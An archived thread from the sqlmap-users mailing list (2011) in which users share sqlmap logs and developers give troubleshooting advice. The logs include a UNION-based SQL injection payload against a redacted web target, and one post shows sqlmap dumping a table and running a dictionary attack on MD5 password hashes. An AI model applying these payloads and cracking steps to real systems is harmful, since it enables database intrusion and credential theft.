>> >> [14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to >> >> 10 columns' injectable >> >> GET parameter 'filename' is vulnerable. Do you want to keep testing the others? >> >> [y/N] N >> >> sqlmap identified the following injection points with a total of 414 HTTP(s) req >> >> uests: >> >> --- >> >> Place: GET >> >> Parameter: filename >> >> Type: UNION query >> >> Title: Generic UNION query (NULL) - 1 to 10 columns >> >> Payload: productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsD >> >> iekxuxW', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Aege'='Aege&cre >> >> ationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isacti >> >> ve=on&comment=uPni >> >> --- >> >> >> >> do you want to exploit this SQL injection? [Y/n] Y >> >> [14:40:13] [INFO] testing MySQL >> >> [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go >> >> ing to retry the request >> >> [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the >> >> next form >> >> [14:40:16] [INFO] you can find results of scanning in multiple targets mode insi >> >> de the CSV file 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' >> >> >> >> [*] shutting down at 14:40:16 >> >> ------------------------------------------------------------------------------ >> All of the data generated in your IT infrastructure is seriously valuable. >> Why? It contains a definitive record of application performance, security >> threats, fraudulent activity, and more. Splunk takes this data and makes >> sense of it. IT sense. And common sense. >> http://p.sf.net/sfu/splunk-d2d-c2 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > > ------------------------------------------------------------------------------ > AppSumo Presents a FREE Video for the SourceForge Community by Eric > Ries, the creator of the Lean Startup Methodology on "Lean Startup > Secrets Revealed." This video shows you how to validate your ideas, > optimize your ideas and identify your business strategy. > http://p.sf.net/sfu/appsumosfdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-12 20:53:45
|
Hi Till, Is the injection point only boolean? No UNION? No error-based? Try to increase the value of --level. Can you enumerate the -b? A run with -t traffic.log and inspection of the log file afterwards would be helpful. I reckon I've only detected a SQL injection in MySQL < 4.1 long time ago and as far as I remember it worked with sqlmap, but I might be wrong. Bernardo On 12 July 2011 12:01, Till .ch <ti...@ho...> wrote: > Hi > > > Lately I've been playing with sqlmap and a 4.0 mysql server. Sqlmap detected > the injection point just fine, but struggled with gathering information > about other tables. > I guess this happened due to the fact as subqueries have been introduced > with mysql >=4.1 (http://dev.mysql.com/doc/refman/4.1/en/news-4-1-x.html) > and thus payloads like the following are regarded as an invalid query on > mysql <4.1: > > > [PAYLOAD] 1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)) > FROM randomtable),1,1)) > 51 > > > Best Regards > Till > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-12 20:49:23
|
Hi Joahnna, Try to provide --union-char and --union-cols after you have verified the UNION query SQL injection manually in your browser. Rerun with --flush-session and -t traffic.log and inspect the log file afterwards to see if the SQL payload is indeed part of the HTTP response you expect it. If the fingerprint keeps failing, provide sqlmap with --dbms "mysql 5". Bernardo On 12 July 2011 14:32, Joahnna Marie Damiao <dam...@ya...> wrote: > > Hi, > Below is the sqlmap command. Next time I ran it, it already says that the parameter filename is not injectable. However, I always get an info that the target URL is UNION injectable but the number of columns change every session. I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable message but nothing is vulnerable. What seems to be the problem here? Anybody can help me? > > C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --b > > atch --beep > > > > sqlmap/1.0-dev (r4221) - automatic SQL injection and database takeover tool > > http://www.sqlmap.org > > > > [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual > > consent is illegal. It is the end user's responsibility to obey all applicable > > local, state and federal laws. Authors assume no liability and are not responsib > > le for any misuse or damage caused by this program > > > > [*] starting at 14:39:37 > > > > [14:39:37] [INFO] setting file for logging HTTP traffic > > [14:39:37] [INFO] testing connection to the target url > > [14:39:38] [INFO] searching for forms > > [#1] form: [INFO] > > GET xxxxxxxxx > > do you want to test this form? [Y/n/q] > > > Y > > Edit GET data [default: xxxxxxxx > > do you want to fill blank fields with random values? [Y/n] Y > > [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\xxxx\session' as sessi > > on file > > [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' > > as results file > > [14:39:38] [INFO] testing if the url is stable, wait a few seconds > > [14:39:39] [INFO] url is stable > > [14:39:39] [INFO] testing if GET parameter 'productid' is dynamic > > [14:39:39] [WARNING] GET parameter 'productid' appears to be not dynamic > > [14:39:39] [WARNING] heuristic test shows that GET parameter 'productid' might n > > ot be injectable > > [14:39:39] [INFO] testing sql injection on GET parameter 'productid' > > [14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' > > [14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause > > ' > > [14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' > > [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o > > r HAVING clause' > > [14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT > > ype)' > > [14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries' > > [14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries' > > [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' > > [14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' > > [14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' > > [14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' > > [14:39:41] [INFO] testing 'Oracle AND time-based blind' > > [14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' > > [14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' > > [14:39:42] [WARNING] using unescaped version of the test because of zero knowled > > ge of the back-end DBMS. you can try to explicitly set it using the --dbms optio > > n > > [14:39:44] [WARNING] GET parameter 'productid' is not injectable > > [14:39:44] [INFO] testing if GET parameter 'name' is dynamic > > [14:39:44] [WARNING] GET parameter 'name' appears to be not dynamic > > [14:39:44] [WARNING] heuristic test shows that GET parameter 'name' might not be > > injectable > > [14:39:44] [INFO] testing sql injection on GET parameter 'name' > > [14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' > > [14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause > > ' > > [14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' > > [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o > > r HAVING clause' > > [14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT > > ype)' > > [14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries' > > [14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries' > > [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' > > [14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' > > [14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' > > [14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' > > [14:39:46] [INFO] testing 'Oracle AND time-based blind' > > [14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' > > [14:39:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' > > [14:39:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:39:51] [WARNING] GET parameter 'name' is not injectable > > [14:39:51] [INFO] testing if GET parameter 'filename' is dynamic > > [14:39:52] [WARNING] GET parameter 'filename' appears to be not dynamic > > [14:39:52] [WARNING] heuristic test shows that GET parameter 'filename' might no > > t be injectable > > [14:39:52] [INFO] testing sql injection on GET parameter 'filename' > > [14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' > > [14:39:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:39:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause > > ' > > [14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' > > [14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o > > r HAVING clause' > > [14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT > > ype)' > > [14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries' > > [14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries' > > [14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' > > [14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from > > previous timed based payload. if the problem persists please wait for few minut > > es and rerun without flag T in --technique option (e.g. --flush-session --techni > > que=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2) > > [14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' > > [14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' > > [14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' > > [14:39:56] [INFO] testing 'Oracle AND time-based blind' > > [14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' > > [14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' > > [14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:09] [CRITICAL] unable to connect to the target url or proxy > > [14:40:09] [INFO] target url appears to be UNION injectable with 10 columns > > [14:40:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:13] [CRITICAL] unable to connect to the target url or proxy > > [14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to > > 10 columns' injectable > > GET parameter 'filename' is vulnerable. Do you want to keep testing the others? > > [y/N] N > > sqlmap identified the following injection points with a total of 414 HTTP(s) req > > uests: > > --- > > Place: GET > > Parameter: filename > > Type: UNION query > > Title: Generic UNION query (NULL) - 1 to 10 columns > > Payload: productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsD > > iekxuxW', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Aege'='Aege&cre > > ationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isacti > > ve=on&comment=uPni > > --- > > > > do you want to exploit this SQL injection? [Y/n] Y > > [14:40:13] [INFO] testing MySQL > > [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go > > ing to retry the request > > [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the > > next form > > [14:40:16] [INFO] you can find results of scanning in multiple targets mode insi > > de the CSV file 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' > > > > [*] shutting down at 14:40:16 > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-12 20:45:34
|
Hi Olu, This should be fixed now. Can you please retry your run after an svn update and report back? Bernardo On 12 July 2011 14:47, Olu Akindeinde <sey...@gm...> wrote: > Hi guys, > I got this error from SQLMap when attempting to crack the hashes discovered > [14:44:17] [INFO] using hash method: 'md5_generic_passwd' > what dictionary do you want to use? > [1] default dictionary file (press Enter) > [2] custom dictionary file > [3] file with list of dictionary files >> > [14:44:18] [INFO] using default dictionary > [14:44:18] [INFO] loading dictionary from > '/Users/fx/sqlmap/txt/wordlist.txt' > do you want to use common password suffixes? (slow!) [y/N] n > [14:44:21] [INFO] starting dictionary attack (md5_generic_passwd) > [14:44:21] [INFO] starting 4 processes > [14:44:24] [INFO] current status: 104% (zoagi...) > [14:44:24] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4257), retry > your run with the latest development version from the Subversion repository. > If the exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the bug, > fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4257) > Python version: 2.6.1 > Operating system: posix > Command line: ./sqlmap.py -u ******************************************** -v > 3 -D ********** -T ********* --dump --replicate --parse-errors --threads=10 > --level=3 --risk=3 > Technique: UNION > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 86, in main > start() > File "/Users/fx/sqlmap/lib/controller/controller.py", line 554, in start > action() > File "/Users/fx/sqlmap/lib/controller/action.py", line 109, in action > conf.dbmsHandler.dumpTable() > File "/Users/fx/sqlmap/plugins/generic/enumeration.py", line 1742, in > dumpTable > attackDumpedTable() > File "/Users/fx/sqlmap/lib/utils/hash.py", line 290, in attackDumpedTable > results = dictionaryAttack(attack_dict) > File "/Users/fx/sqlmap/lib/utils/hash.py", line 583, in dictionaryAttack > results.extend([retVal.get() for i in xrange(retVal.qsize())] if retVal > else []) > File > "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/multiprocessing/queues.py", > line 113, in qsize > return self._maxsize - self._sem._semlock._get_value() > NotImplementedError > [*] shutting down at 14:44:24 > > Kind Regards, > Olu > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Olu A. <sey...@gm...> - 2011-07-12 13:47:07
|
Hi guys,
I got this error from SQLMap when attempting to crack the hashes discovered
[14:44:17] [INFO] using hash method: 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[14:44:18] [INFO] using default dictionary
[14:44:18] [INFO] loading dictionary from
'/Users/fx/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[14:44:21] [INFO] starting dictionary attack (md5_generic_passwd)
[14:44:21] [INFO] starting 4 processes
[14:44:24] [INFO] current status: 104% (zoagi...)
[14:44:24] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4257), retry
your run with the latest development version from the Subversion repository.
If the exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the bug,
fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4257)
Python version: 2.6.1
Operating system: posix
Command line: ./sqlmap.py -u ******************************************** -v
3 -D ********** -T ********* --dump --replicate --parse-errors --threads=10
--level=3 --risk=3
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
File "./sqlmap.py", line 86, in main
start()
File "/Users/fx/sqlmap/lib/controller/controller.py", line 554, in start
action()
File "/Users/fx/sqlmap/lib/controller/action.py", line 109, in action
conf.dbmsHandler.dumpTable()
File "/Users/fx/sqlmap/plugins/generic/enumeration.py", line 1742, in
dumpTable
attackDumpedTable()
File "/Users/fx/sqlmap/lib/utils/hash.py", line 290, in attackDumpedTable
results = dictionaryAttack(attack_dict)
File "/Users/fx/sqlmap/lib/utils/hash.py", line 583, in dictionaryAttack
results.extend([retVal.get() for i in xrange(retVal.qsize())] if retVal
else [])
File
"/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/multiprocessing/queues.py",
line 113, in qsize
return self._maxsize - self._sem._semlock._get_value()
NotImplementedError
[*] shutting down at 14:44:24
Kind Regards,
Olu
|
|
From: Joahnna M. D. <dam...@ya...> - 2011-07-12 13:39:42
|
Note: I just updated my sqlmap version. I'm now running the r4258. --- On Tue, 7/12/11, Joahnna Marie Damiao <dam...@ya...> wrote: From: Joahnna Marie Damiao <dam...@ya...> Subject: [sqlmap-users] MySQL Union technique gives out inconsistent results To: sql...@li... Date: Tuesday, July 12, 2011, 3:32 PM Hi, Below is the sqlmap command. Next time I ran it, it already says that the parameter filename is not injectable. However, I always get an info that the target URL is UNION injectable but the number of columns change every session. I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable message but nothing is vulnerable. What seems to be the problem here? Anybody can help me? C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --b atch --beep sqlmap/1.0-dev (r4221) - automatic SQL injection and database takeover tool http://www.sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 14:39:37 [14:39:37] [INFO] setting file for logging HTTP traffic [14:39:37] [INFO] testing connection to the target url [14:39:38] [INFO] searching for forms [#1] form: [INFO] GET xxxxxxxxx do you want to test this form? [Y/n/q] > Y Edit GET data [default: xxxxxxxx do you want to fill blank fields with random values? [Y/n] Y [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\xxxx\session' as sessi on file [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' as results file [14:39:38] [INFO] testing if the url is stable, wait a few seconds [14:39:39] [INFO] url is stable [14:39:39] [INFO] testing if GET parameter 'productid' is dynamic [14:39:39] [WARNING] GET parameter 'productid' appears to be not dynamic [14:39:39] [WARNING] heuristic test shows that GET parameter 'productid' might n ot be injectable [14:39:39] [INFO] testing sql injection on GET parameter 'productid' [14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries' [14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [14:39:41] [INFO] testing 'Oracle AND time-based blind' [14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [14:39:42] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. you can try to explicitly set it using the --dbms optio n [14:39:44] [WARNING] GET parameter 'productid' is not injectable [14:39:44] [INFO] testing if GET parameter 'name' is dynamic [14:39:44] [WARNING] GET parameter 'name' appears to be not dynamic [14:39:44] [WARNING] heuristic test shows that GET parameter 'name' might not be injectable [14:39:44] [INFO] testing sql injection on GET parameter 'name' [14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries' [14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [14:39:46] [INFO] testing 'Oracle AND time-based blind' [14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [14:39:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [14:39:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:51] [WARNING] GET parameter 'name' is not injectable [14:39:51] [INFO] testing if GET parameter 'filename' is dynamic [14:39:52] [WARNING] GET parameter 'filename' appears to be not dynamic [14:39:52] [WARNING] heuristic test shows that GET parameter 'filename' might no t be injectable [14:39:52] [INFO] testing sql injection on GET parameter 'filename' [14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [14:39:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries' [14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minut es and rerun without flag T in --technique option (e.g. --flush-session --techni que=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2) [14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [14:39:56] [INFO] testing 'Oracle AND time-based blind' [14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:09] [CRITICAL] unable to connect to the target url or proxy [14:40:09] [INFO] target url appears to be UNION injectable with 10 columns [14:40:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:13] [CRITICAL] unable to connect to the target url or proxy [14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable GET parameter 'filename' is vulnerable. Do you want to keep testing the others? [y/N] N sqlmap identified the following injection points with a total of 414 HTTP(s) req uests: --- Place: GET Parameter: filename Type: UNION query Title: Generic UNION query (NULL) - 1 to 10 columns Payload: productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsD iekxuxW', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Aege'='Aege&cre ationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isacti ve=on&comment=uPni --- do you want to exploit this SQL injection? [Y/n] Y [14:40:13] [INFO] testing MySQL [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the next form [14:40:16] [INFO] you can find results of scanning in multiple targets mode insi de the CSV file 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' [*] shutting down at 14:40:16 -----Inline Attachment Follows----- ------------------------------------------------------------------------------ All of the data generated in your IT infrastructure is seriously valuable. Why? It contains a definitive record of application performance, security threats, fraudulent activity, and more. Splunk takes this data and makes sense of it. IT sense. And common sense. http://p.sf.net/sfu/splunk-d2d-c2 -----Inline Attachment Follows----- _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Joahnna M. D. <dam...@ya...> - 2011-07-12 13:33:05
|
Hi, Below is the sqlmap command. Next time I ran it, it already says that the parameter filename is not injectable. However, I always get an info that the target URL is UNION injectable but the number of columns change every session. I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable message but nothing is vulnerable. What seems to be the problem here? Anybody can help me? C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --b atch --beep sqlmap/1.0-dev (r4221) - automatic SQL injection and database takeover tool http://www.sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 14:39:37 [14:39:37] [INFO] setting file for logging HTTP traffic [14:39:37] [INFO] testing connection to the target url [14:39:38] [INFO] searching for forms [#1] form: [INFO] GET xxxxxxxxx do you want to test this form? [Y/n/q] > Y Edit GET data [default: xxxxxxxx do you want to fill blank fields with random values? [Y/n] Y [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\xxxx\session' as sessi on file [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' as results file [14:39:38] [INFO] testing if the url is stable, wait a few seconds [14:39:39] [INFO] url is stable [14:39:39] [INFO] testing if GET parameter 'productid' is dynamic [14:39:39] [WARNING] GET parameter 'productid' appears to be not dynamic [14:39:39] [WARNING] heuristic test shows that GET parameter 'productid' might n ot be injectable [14:39:39] [INFO] testing sql injection on GET parameter 'productid' [14:39:39] [INFO] testing 'AND 